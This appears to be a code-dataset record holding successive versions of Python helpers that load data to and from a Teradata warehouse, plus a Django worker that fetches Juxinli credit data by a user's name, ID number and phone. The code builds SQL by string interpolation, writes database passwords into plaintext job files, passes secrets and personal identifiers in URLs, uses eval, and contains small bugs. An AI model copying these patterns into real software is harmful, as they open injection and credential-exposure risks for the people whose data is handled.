(Producer_File_Detail);\n );\"\"\"\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\n f.write(txt)\n p = subprocess.Popen(shlex.split(\n f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))\n p.wait()\n print('Merging in Teradata... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'insert into {table} sel * from {td_temp_table}')\n session.close()\n print('Cleaning... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'drop table {td_temp_table}')\n session.close()\n shutil.rmtree(path_to_folder)\n print('Done!')\n",
"step-4": "import os\nimport numpy as np\nimport pandas as pd\nimport random\nimport platform\nimport subprocess\nimport shlex\nimport teradata\nfrom joblib import dump\nimport shutil\nfrom tqdm import tqdm\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n f.write(config)\n\n\ndef td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',\n fast=False, return_df=False, csv=True, chunksize=100000):\n \"\"\"\n Функция возвращает данные из ТД: путь к csv или датафрейм.\n\n fast=True - использовать утилиты ТД, False - ODBC;\n return_df - вернуть датафрейм;\n csv - записать данные в файл при fast=False;\n chunksize - размер бача для ODBC;\n query должен содержать where, чтобы выгрузить название столбцов из БД\n\n \"\"\"\n local_seed = str(random.randint(0, 1000000))\n query = query.replace('\\n', ' ')\n if not fast:\n session = get_session(bd, username, password)\n frame = sql2df(query, session, chunksize=chunksize)\n session.close()\n if return_df:\n return frame\n else:\n path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if csv:\n filename = path_to_file + '.csv'\n frame.to_csv(filename, sep=';', index=False, encoding='utf8')\n return filename\n else:\n dump(frame, path_to_file)\n return path_to_file\n else:\n check_config()\n query = query.replace(\"'\", \"''\")\n path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n os.mkdir(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n path_to_file = os.path.join(path_to_folder, 'dataset.csv')\n open(path_to_file, 'w').close()\n txt = (\n \"\"\"SourceTdpId = '%s'\n ,SourceUserName = '%s' \n ,SourceUserPassword = '%s'\n ,DDLPrivateLogName = 'ddlprivate.log'\n ,ExportPrivateLogName = 'exportprivate.log'\n ,TargetErrorList = ['3807']\n ,TargetFileName = '%s'\n ,TargetFormat = 'delimited'\n ,TargetTextDelimiter = ';'\n ,TargetOpenMode = 'write'\n ,SelectStmt = '%s' \"\"\"\n % (bd, username, password, path_to_file, query))\n qtxt = \"\"\"USING CHAR SET UTF-8\n DEFINE JOB qstart2\n (\n APPLY TO OPERATOR ($FILE_WRITER)\n SELECT * FROM OPERATOR($EXPORT);\n );\"\"\"\n with open(path_to_folder + '/qstart2.txt', 'w+') as f:\n f.write(qtxt)\n with open(path_to_folder + '/jobvars.txt', 'w+') as f:\n f.write(txt)\n p = subprocess.run(shlex.split(\n f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'\n ), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n query = query.replace('\\n', ' ').replace(\"''\", \"'\")\n query = query.lower()\n query_list = query.split('where')\n if len(query_list) == 2:\n columns_query = ' where 1=0 and '.join(query_list)\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n else:\n print(\"Coudn't load columns names\")\n columns_names = None\n if not return_df:\n if columns_names:\n with open(path_to_folder + '/columns_names.txt', 'w') as f:\n f.write('\\n'.join(columns_names))\n return path_to_file\n else:\n if columns_names:\n frame = pd.read_csv(path_to_file, names=columns_names,\n delimiter=';')\n else:\n frame = pd.read_csv(path_to_file, header=None, delimiter=';')\n return frame\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\ndef td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=\n '', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=\n None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):\n \"\"\"\n Функция записывате данные в ТД через утилиты или ODBC\n\n \"\"\"\n table = schema + '.' + tbl_name\n if not fast:\n if not loadframe:\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=\n False)\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\n df_dict = df.to_dict('records')\n session = get_session(bd, username, password)\n for i in tqdm(range(n_iters), total=n_iters):\n session.executemany(\n f\"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})\"\n , [list(row.values()) for row in df_dict[i * batch_size:i *\n batch_size + batch_size]], batch=True)\n session.close()\n else:\n check_config()\n local_seed = str(random.randint(0, 1000000))\n path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n if loadframe:\n converted = df.replace(np.NaN, '').astype(str)\n path_to_file = path_to_folder + '/tmp.csv'\n converted.to_csv(path_to_file, index=False, header=False, sep=\n ';', encoding='utf8')\n converted_len = converted.apply(lambda x: x.str.encode('utf-8')\n .apply(len)).max().to_dict()\n else:\n converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',\n header=None, encoding='utf8', low_memory=False, nrows=100000)\n columns_query = f'select * from {table} where 1=0'\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n shutil.copy(path_to_file, path_to_folder + '/tmp.csv')\n converted_len.columns = columns_names\n converted_len = converted_len.apply(lambda x: x.str.encode(\n 'utf-8').apply(len)).max().to_dict()\n td_temp_table = table + '_tmp_' + local_seed\n session = get_session(bd, username, password)\n session.execute(\n f'create multiset table {td_temp_table} as {table} with no data no primary index'\n )\n session.close()\n txt = f\"\"\"USING CHARACTER SET UTF8\n DEFINE JOB teradata_upload\n Description 'Fastload script'\n (\n DEFINE OPERATOR Load_operator\n TYPE LOAD\n SCHEMA *\n ATTRIBUTES\n (\n VARCHAR TdPid='{bd}',\n VARCHAR UserName='{username}',\n VARCHAR UserPassWord='{password}',\n VARCHAR TargetTable='{td_temp_table}',\n VARCHAR LogTable='{schema}.usr_tpt_log',\n VARCHAR DateForm='AnsiDate',\n INTEGER MaxSessions={max_sessions}\n );\n\n DEFINE SCHEMA Define_Employee_Schema\n (\n {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())} \n );\n\n DEFINE OPERATOR Producer_File_Detail\n TYPE DATACONNECTOR PRODUCER\n SCHEMA Define_Employee_Schema\n ATTRIBUTES\n (\n VARCHAR DirectoryPath='{path_to_folder}/'\n , VARCHAR FileName='tmp.csv'\n , VARCHAR TextDelimiter=';'\n , VARCHAR QuotedData = 'Optional'\n , VARCHAR OpenQuoteMark = '\"'\n , VARCHAR CloseQuoteMark = '\"'\n , VARCHAR Format='Delimited'\n , VARCHAR OpenMode='Read'\n , VARCHAR INDICATORMODE='N'\n , INTEGER BUFFERSIZE = {buffersize}\n );\n\n APPLY\n (\n 'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'\n )\n TO OPERATOR(Load_operator)\n\n SELECT * FROM OPERATOR (Producer_File_Detail);\n );\"\"\"\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\n f.write(txt)\n p = subprocess.Popen(shlex.split(\n f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))\n p.wait()\n print('Merging in Teradata... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'insert into {table} sel * from {td_temp_table}')\n session.close()\n print('Cleaning... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'drop table {td_temp_table}')\n session.close()\n shutil.rmtree(path_to_folder)\n print('Done!')\n",
"step-5": "import os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport platform\r\nimport subprocess\r\nimport shlex\r\nimport teradata\r\nfrom joblib import dump\r\nimport shutil\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef get_session(db, usr, pwd):\r\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\r\n\r\n if platform.system() == 'Windows':\r\n driver = 'Teradata'\r\n else:\r\n driver = 'Teradata Database ODBC Driver 16.20'\r\n\r\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1', logConsole=False)\r\n session = udaExec.connect(method='odbc',\r\n system=db, # Сервер ТД из файла\r\n username=usr, # Логин TD\r\n password=pwd, # Пароль TD\r\n driver = driver,\r\n charset='UTF8',\r\n autoCommit='True',\r\n USEREGIONALSETTINGS='N',\r\n transactionMode = 'TERADATA'\r\n )\r\n return session\r\n\r\n\r\ndef sql2df(query, session, chunksize=100000):\r\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\r\n db = pd.read_sql(query, session, chunksize=chunksize)\r\n data = pd.DataFrame()\r\n for x in tqdm(db):\r\n data = pd.concat([data, x])\r\n return data\r\n\r\n\r\ndef check_config():\r\n \"\"\" .twbcfg.ini to root path \"\"\"\r\n path = os.path.expanduser(\"~\")\r\n config_path = os.path.join(path, \".twbcfg.ini\")\r\n log_path = os.path.join(path, \"tmp\", \"teradata_logs\")\r\n\r\n if not os.path.exists(config_path):\r\n if not os.path.exists(log_path):\r\n os.mkdir(log_path)\r\n config = f'''CheckpointDirectory='{log_path}' \r\n LogDirectory='{log_path}' '''\r\n with open(config_path, 'w') as f:\r\n f.write(config)\r\n\r\n\r\n\r\ndef td_download(query=\"\",\r\n bd=\"tdsb15.cgs.sbrf.ru\",\r\n username=\"\", password=\"\",\r\n fast=False, return_df=False, csv=True,\r\n chunksize=100000):\r\n \"\"\"\r\n Функция возвращает данные из ТД: путь к csv или датафрейм.\r\n\r\n fast=True - использовать утилиты ТД, False - ODBC;\r\n return_df - вернуть датафрейм;\r\n csv - записать данные в файл при fast=False;\r\n chunksize - размер бача для ODBC;\r\n query должен содержать where, чтобы выгрузить название столбцов из БД\r\n\r\n \"\"\"\r\n local_seed = str(random.randint(0, 1000000))\r\n query = query.replace(\"\\n\", \" \")\r\n\r\n if not fast:\r\n # Teradata python package\r\n session = get_session(bd, username, password)\r\n frame = sql2df(query, session, chunksize=chunksize)\r\n session.close()\r\n if return_df:\r\n return frame\r\n else:\r\n path_to_file = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)\r\n if csv:\r\n filename = path_to_file + \".csv\"\r\n frame.to_csv(filename, sep=';', index=False, encoding=\"utf8\")\r\n return filename\r\n else:\r\n dump(frame, path_to_file)\r\n return path_to_file\r\n else:\r\n # FastLoad\r\n check_config()\r\n query = query.replace(\"'\", \"''\") # prepair query for FastLoad\r\n path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)\r\n\r\n if os.path.exists(path_to_folder):\r\n shutil.rmtree(path_to_folder)\r\n os.mkdir(path_to_folder)\r\n else:\r\n os.mkdir(path_to_folder)\r\n\r\n path_to_file = os.path.join(path_to_folder, 'dataset.csv')\r\n open(path_to_file, 'w').close()\r\n\r\n # Create utility files\r\n txt = '''SourceTdpId = '%s'\r\n ,SourceUserName = '%s' \r\n ,SourceUserPassword = '%s'\r\n ,DDLPrivateLogName = 'ddlprivate.log'\r\n ,ExportPrivateLogName = 'exportprivate.log'\r\n ,TargetErrorList = ['3807']\r\n ,TargetFileName = '%s'\r\n ,TargetFormat = 'delimited'\r\n ,TargetTextDelimiter = ';'\r\n ,TargetOpenMode = 'write'\r\n ,SelectStmt = '%s' ''' % (bd, username, password, path_to_file, query)\r\n qtxt = '''USING CHAR SET UTF-8\r\n DEFINE JOB qstart2\r\n (\r\n APPLY TO OPERATOR ($FILE_WRITER)\r\n SELECT * FROM OPERATOR($EXPORT);\r\n );'''\r\n with open(path_to_folder + '/qstart2.txt', 'w+') as f:\r\n f.write(qtxt)\r\n with open(path_to_folder + '/jobvars.txt', 'w+') as f:\r\n f.write(txt)\r\n # run FastLoad\r\n# p = subprocess.Popen(\r\n# shlex.split(f\"tbuild -f {path_to_folder}/qstart2.txt -v {path_to_folder}/jobvars.txt -j qstart2\")\r\n# )\r\n# p.wait()\r\n p = subprocess.run(\r\n shlex.split(f\"tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}\"), stdout=subprocess.PIPE, stderr=subprocess.STDOUT\r\n )\r\n\r\n # columns names\r\n query = query.replace(\"\\n\", \" \").replace(\"''\",\"'\")\r\n query = query.lower()\r\n query_list = query.split(\"where\")\r\n if len(query_list) == 2:\r\n columns_query = \" where 1=0 and \".join(query_list)\r\n session = get_session(bd, username, password)\r\n columns_names = pd.read_sql(columns_query, session).columns.tolist()\r\n session.close()\r\n else:\r\n print(\"Coudn't load columns names\")\r\n columns_names = None\r\n\r\n if not return_df:\r\n if columns_names:\r\n with open(path_to_folder + '/columns_names.txt', 'w') as f:\r\n f.write(\"\\n\".join(columns_names))\r\n return path_to_file\r\n else:\r\n if columns_names:\r\n frame = pd.read_csv(path_to_file, names=columns_names, delimiter=';')\r\n else:\r\n frame = pd.read_csv(path_to_file, header=None, delimiter=';')\r\n return frame\r\n\r\n\r\ndef py2td(x):\r\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\r\n x_type = type(x)\r\n if x_type == float:\r\n if x % 1 == 0:\r\n return int(x)\r\n else:\r\n return x\r\n elif x == 'null':\r\n return None\r\n else:\r\n return x\r\n\r\n\r\ndef td_import(\r\n username=\"\", password=\"\",\r\n bd=\"tdsb15.cgs.sbrf.ru\", tbl_name=\"\",\r\n schema=\"SBX_RETAIL_MP_PFM\",\r\n loadframe=True, df=None, path_to_file=None, fast=False,\r\n batch_size=12000, max_sessions=6, buffersize=524288,\r\n):\r\n \"\"\"\r\n Функция записывате данные в ТД через утилиты или ODBC\r\n\r\n \"\"\"\r\n table = schema + \".\" + tbl_name\r\n if not fast:\r\n if not loadframe:\r\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=False)\r\n # insert\r\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\r\n df_dict = df.to_dict('records')\r\n session = get_session(bd, username, password)\r\n for i in tqdm(range(n_iters), total=n_iters):\r\n session.executemany(\r\n f\"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})\",\r\n [list(row.values()) for row in df_dict[i * batch_size:i * batch_size + batch_size]],\r\n batch=True\r\n )\r\n session.close()\r\n else:\r\n check_config()\r\n local_seed = str(random.randint(0, 1000000))\r\n path_to_folder = os.path.join(os.getcwd(), \"data\", \"output_\" + local_seed)\r\n\r\n if os.path.exists(path_to_folder):\r\n shutil.rmtree(path_to_folder)\r\n else:\r\n os.mkdir(path_to_folder)\r\n\r\n if loadframe:\r\n converted = df.replace(np.NaN, '').astype(str)\r\n path_to_file = path_to_folder + '/tmp.csv'\r\n converted.to_csv(path_to_file, index=False, header=False, sep=\";\", encoding=\"utf8\")\r\n converted_len = converted.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()\r\n else:\r\n converted_len = pd.read_csv(path_to_file, sep=';', dtype=\"str\", header=None, encoding=\"utf8\",\r\n low_memory=False, nrows=100000)\r\n columns_query = f\"select * from {table} where 1=0\"\r\n session = get_session(bd, username, password)\r\n columns_names = pd.read_sql(columns_query, session).columns.tolist()\r\n session.close()\r\n shutil.copy(path_to_file, path_to_folder + \"/tmp.csv\") # cp file for correct working Change to move&\r\n\r\n converted_len.columns = columns_names\r\n converted_len = converted_len.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()\r\n\r\n # create empty tmp table\r\n td_temp_table = table + \"_tmp_\" + local_seed # change schema\r\n session = get_session(bd, username, password)\r\n session.execute(\r\n f\"create multiset table {td_temp_table} as {table} with no data no primary index\"\r\n )\r\n session.close()\r\n # Create utility file\r\n txt = f\"\"\"USING CHARACTER SET UTF8\r\n DEFINE JOB teradata_upload\r\n Description 'Fastload script'\r\n (\r\n DEFINE OPERATOR Load_operator\r\n TYPE LOAD\r\n SCHEMA *\r\n ATTRIBUTES\r\n (\r\n VARCHAR TdPid='{bd}',\r\n VARCHAR UserName='{username}',\r\n VARCHAR UserPassWord='{password}',\r\n VARCHAR TargetTable='{td_temp_table}',\r\n VARCHAR LogTable='{schema}.usr_tpt_log',\r\n VARCHAR DateForm='AnsiDate',\r\n INTEGER MaxSessions={max_sessions}\r\n );\r\n\r\n DEFINE SCHEMA Define_Employee_Schema\r\n (\r\n {','.join(f'{key} VARCHAR({max(1, value*2)})' for key, value in converted_len.items())} \r\n );\r\n\r\n DEFINE OPERATOR Producer_File_Detail\r\n TYPE DATACONNECTOR PRODUCER\r\n SCHEMA Define_Employee_Schema\r\n ATTRIBUTES\r\n (\r\n VARCHAR DirectoryPath='{path_to_folder}/'\r\n , VARCHAR FileName='tmp.csv'\r\n , VARCHAR TextDelimiter=';'\r\n , VARCHAR QuotedData = 'Optional'\r\n , VARCHAR OpenQuoteMark = '\"'\r\n , VARCHAR CloseQuoteMark = '\"'\r\n , VARCHAR Format='Delimited'\r\n , VARCHAR OpenMode='Read'\r\n , VARCHAR INDICATORMODE='N'\r\n , INTEGER BUFFERSIZE = {buffersize}\r\n );\r\n\r\n APPLY\r\n (\r\n 'INSERT INTO {td_temp_table}({','.join(\r\n f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(\r\n f'{key}' for key, value in converted_len.items())});'\r\n )\r\n TO OPERATOR(Load_operator)\r\n\r\n SELECT * FROM OPERATOR (Producer_File_Detail);\r\n );\"\"\"\r\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\r\n f.write(txt)\r\n # Start TPT load\r\n p = subprocess.Popen(\r\n shlex.split(f\"tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}\")\r\n )\r\n p.wait()\r\n # Merge\r\n print(\"Merging in Teradata... \\r\", end='', flush=True)\r\n session = get_session(bd, username, password)\r\n session.execute(f\"insert into {table} sel * from {td_temp_table}\")\r\n session.close()\r\n # Drop temporary table\r\n print(\"Cleaning... \\r\", end='', flush=True)\r\n session = get_session(bd, username, password)\r\n session.execute(f\"drop table {td_temp_table}\")\r\n session.close()\r\n # Cleanup\r\n shutil.rmtree(path_to_folder)\r\n print(\"Done!\")\r\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
import urllib2, json, traceback
from django.conf import settings
from django.db import models
from TkManager.order.models import User
from TkManager.juxinli.models import *
from TkManager.juxinli.error_no import *
from TkManager.common.tk_log import TkLog
from datetime import datetime
from django_gearman_commands import GearmanWorkerBaseCommand
from django.db import transaction
import objgraph
class JuxinliBaseCommand(GearmanWorkerBaseCommand):
"""
从聚信力获取json数据,然后把数据存入数据库
init_config 配置数据的存储方式,需要子类自己实现 配置文件格式参看注释
get_juxinli_data 执行解析存储操作
"""
def __init__(self):
super(JuxinliBaseCommand, self).__init__()
self._org_name = settings.JUXINLI_CONF['org_name']
self._client_secret = settings.JUXINLI_CONF['client_secret']
self._access_report_data_api = settings.JUXINLI_CONF['access_report_data_api']
self._access_raw_data_api = settings.JUXINLI_CONF['access_raw_data_api']
self._access_report_token_api = settings.JUXINLI_CONF['access_report_token_api']
self._access_e_business_raw_data_api = settings.JUXINLI_CONF['access_e_business_raw_data_api']
self._options = {
'update_days' : 21,
'force_update' : False,
}
self.init_config()
def init_config():
'''
参考格式:
self._transformer = {
'basic_transformer' : {
'name' : 'PhoneBasic', # django的Model类名称
'path' : 'raw_data/members/transactions:0/basic', #json数据的路径
'data_type' : 'map', # 数据的类型如果是单条就是map,如果是多条就是list
'version' : True, # 是否使用版本控制,如果是真那么每次拉数据会新增版本号,否则都用版本1
'trans' : { #数据的转化格式 source_field(json) -> dest_field(db model)
"cell_phone": "cell_phone",
"idcard": "idcard",
"real_name": "real_name",
"reg_time": "reg_time",
"update_time": "update_time",
"receiver" : { #如果是外键就用一个嵌套的格式来表示 (嵌套就没必要再用path定位了吧,默认就是当前路径)
"name" : "Receiver"
"req_call_cnt/data_type" : "list"
"version" : True,
"trans": {
"name" : "name",
"phone_num_list" : "phone_num_list",
"amount" : "amount",
"count" : "count",
},
},
},
},
}
'''
pass
def test(self,user,data):
if not data:
return ERR_GET_RAW_DATA_FAILED
ret_code = self._save_raw_data(data, user, self._options)
return ret_code
def get_juxinli_data(self, uid, url):
try:
user = User.objects.get(pk=uid)
token = self._get_token()
if not token:
return ERR_CREATE_TOKEN_FAILED
data = self._get_juxinli_data(token, user, url)
if not data:
return ERR_GET_RAW_DATA_FAILED
ret_code = self._save_raw_data(data, user, self._options)
if ret_code != 0:
return ret_code
#data = self._get_report_data(token, user)
#print data
#print "@@ print ret", ret_code
return RETURN_SUCCESS
except Exception, e:
traceback.print_exc()
TkLog().error("get juxinli call failed %s" % str(e))
return ERR_OTHER_EXCEPTION
def _open_url(self, url):
'''
get http request return json
'''
req1 = urllib2.Request(url=url)
html = urllib2.urlopen(req1).read().decode('utf-8')
return json.loads(html.encode("utf-8"))
def _get_token(self):
'''
生成一个新的用来获取数据的token 失败返回None
'''
url = u"%s?client_secret=%s&hours=24&org_name=%s" % (self._access_report_token_api, self._client_secret, self._org_name)
html = self._open_url(url)
#if
try:
res = html['access_token']
return res
except KeyError, e:
return None
def _get_juxinli_data(self, access_token, user, url):
'''
获取聚信力数据 返回json
'''
raw_url = u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (url, self._client_secret, access_token, user.name, user.id_no, user.phone_no)
#print raw_url
try:
res = self._open_url(raw_url.encode('utf-8'))
# print res
# print res['raw_data']['members']['error_msg']
success = res["success"]
if success != "true":
return None
return res
except KeyError, e:
return None
#def _get_report_data(self, access_token, user):
# report_url = u'%s?client_secret=%s&access_token=%s&name=%s&idcard=%s&phone=%s' % (self._access_report_token_api, self._client_secret, access_token, user.name, user.id_no, user.phone_no)
# print report_url
# res = self._open_url(report_url.encode('utf-8'))
# #print res
# #print res['raw_data']['members']['error_msg']
# return res
def _allow_overwrite_data(self, user, options):
return True
def _get_data_from_path(self, data, path):
'''
path语法 / 分割路径 : 选择list中的序号
'''
try:
fields = path.split("/")
#print fields
res = data
for field in fields:
if field.find(":") != -1:
parts = field.split(":")
if len(parts) != 2:
TkLog().error("field format error %s" % (field))
return None
res = res[parts[0]][int(parts[1])]
else:
res = res[field]
return res
except Exception, e:
print e
traceback.print_exc()
TkLog().error("get data from path failed %s" % str(e))
return None
def _save_raw_data(self, data, user, options):
"""
可以重入,一个用户的信息如果更新时间少于options.update_days天,不会更新db,否则添加记录
"""
if not self._allow_overwrite_data(user, options):
return RETURN_CAN_NOT_OVERWRITE
for transtype in self._transformer.keys():
adaptor = self._transformer[transtype]
cls = eval(adaptor["name"])
version = 0
objs = cls.objects.filter(owner=user).order_by('-id')[:1]
if len(objs) == 1:
version = objs[0].version
TkLog().info("update %s version %d" % (adaptor["name"], version))
data_list = self._get_data_from_path(data, adaptor["path"])
if not data_list:
TkLog().warn("data not found %s:%s" % (adaptor["name"], adaptor["path"]))
#return -4 #just skip
ret_code = self._save_obj(data_list, cls, user, adaptor, version)
if ret_code != 0:
return ret_code
return RETURN_SUCCESS
@transaction.commit_manually
def _save_obj(self, data_list, cls, user, adaptor, version=0, parent=None):
'''
将一个对象写入数据库
根据data_type来判断是map还是list
'''
if adaptor["data_type"] == "list": #data_list是列表数据
for record in data_list:
ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)
if ret_code != 0:
return ret_code
elif adaptor["data_type"] == "map": #data_list是单条数据
record = data_list
ret_code = self._save_single_obj(record, cls, user, adaptor, version, parent)
if ret_code != 0:
return ret_code
transaction.commit()
return 0
def _save_single_obj(self, record, cls, user, adaptor, version = 0, parent=None):
'''
将一个条目写入数据库,如果parent不为空,还需要设置parent的外键
record : 单条json数据条目
cls : 数据库Model
'''
obj = cls()
for source_field, dest_field in adaptor['trans'].items():
if isinstance(dest_field,str):
field_type = obj._meta.get_field(dest_field)
if "/" in source_field:
record[source_field] = self._get_data_from_path(record,source_field)
if isinstance(field_type, models.CharField):
try:
if isinstance(record[source_field],list):
#setattr(obj, dest_field, "#".join(record[source_field]))
setattr(obj, dest_field, record[source_field][0])
else:
setattr(obj, dest_field, record[source_field])
except Exception, e:
TkLog().warn("set char field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.IntegerField):
try:
if not record[source_field]:
setattr(obj, dest_field, 0)
else:
setattr(obj, dest_field, int(record[source_field]))
except Exception, e:
TkLog().warn("set int field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.BigIntegerField):
try:
if not record[source_field]:
setattr(obj, dest_field, 0)
else:
setattr(obj, dest_field, long(record[source_field]))
except Exception, e:
TkLog().warn("set bigint field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.FloatField):
try:
if not record[source_field]:
setattr(obj, dest_field, float(0))
else:
setattr(obj, dest_field, float(record[source_field]))
except Exception, en:
TkLog().warn("set float field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.DateTimeField):
try:
if not record[source_field]:
setattr(obj, dest_field, None)
else:
setattr(obj, dest_field, datetime.strptime(record[source_field], "%Y-%m-%d %H:%M:%S"))
except Exception, e:
TkLog().warn("set datetime field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
elif isinstance(field_type, models.NullBooleanField):
try:
if not record[source_field]:
setattr(obj, dest_field, None)
else:
setattr(obj, dest_field, record[source_field])
except Exception, e:
TkLog().warn("set boolean field failed %s %s" % (str(e), record[source_field]))
return ERR_SETATTR_FAILED
else:
TkLog().error("unsupported type field:%s" % dest_field)
return ERR_UNSUPPORTED_FILED_TYPE
try:
if adaptor['version']:
obj.version = version + 1
else:
obj.version = 0
#if parent:
#setattr(obj, parent["field"], parent["parent_obj"])
obj.owner = user
obj.save()
except Exception, e:
print "save error %s" % str(e)
return ERR_SAVE_OBJECT
for source_field, dest_field in adaptor['trans'].items():
if isinstance(dest_field,dict):
try:
sub_cls = eval(dest_field["name"])
self._save_obj(record[source_field], sub_cls, obj, dest_field, version, {"parent_obj":obj, "field":"owner"})
except Exception, e:
TkLog().warn("set foreignkey field failed %s %s" % (str(e), record[source_field]))
objgraph.show_most_common_types()
return 0
|
normal
|
{
"blob_id": "fa825846c54ed32c2ede94128ac08f9d5e172c0f",
"index": 5581,
"step-1": "# -*- coding: utf-8 -*-\nimport urllib2, json, traceback\n\nfrom django.conf import settings\nfrom django.db import models\nfrom TkManager.order.models import User\nfrom TkManager.juxinli.models import *\nfrom TkManager.juxinli.error_no import *\nfrom TkManager.common.tk_log import TkLog\nfrom datetime import datetime\nfrom django_gearman_commands import GearmanWorkerBaseCommand\nfrom django.db import transaction\nimport objgraph\n\nclass JuxinliBaseCommand(GearmanWorkerBaseCommand):\n \"\"\"\n 从聚信力获取json数据,然后把数据存入数据库\n init_config 配置数据的存储方式,需要子类自己实现 配置文件格式参看注释\n get_juxinli_data 执行解析存储操作\n\n \"\"\"\n def __init__(self):\n super(JuxinliBaseCommand, self).__init__()\n self._org_name = settings.JUXINLI_CONF['org_name']\n self._client_secret = settings.JUXINLI_CONF['client_secret']\n self._access_report_data_api = settings.JUXINLI_CONF['access_report_data_api']\n self._access_raw_data_api = settings.JUXINLI_CONF['access_raw_data_api']\n self._access_report_token_api = settings.JUXINLI_CONF['access_report_token_api']\n self._access_e_business_raw_data_api = settings.JUXINLI_CONF['access_e_business_raw_data_api']\n self._options = {\n 'update_days' : 21,\n 'force_update' : False,\n }\n self.init_config()\n\n def init_config():\n '''\n 参考格式:\n self._transformer = {\n 'basic_transformer' : {\n 'name' : 'PhoneBasic', # django的Model类名称\n 'path' : 'raw_data/members/transactions:0/basic', #json数据的路径\n 'data_type' : 'map', # 数据的类型如果是单条就是map,如果是多条就是list\n 'version' : True, # 是否使用版本控制,如果是真那么每次拉数据会新增版本号,否则都用版本1\n 'trans' : { #数据的转化格式 source_field(json) -> dest_field(db model)\n \"cell_phone\": \"cell_phone\",\n \"idcard\": \"idcard\",\n \"real_name\": \"real_name\",\n \"reg_time\": \"reg_time\",\n \"update_time\": \"update_time\",\n \"receiver\" : { 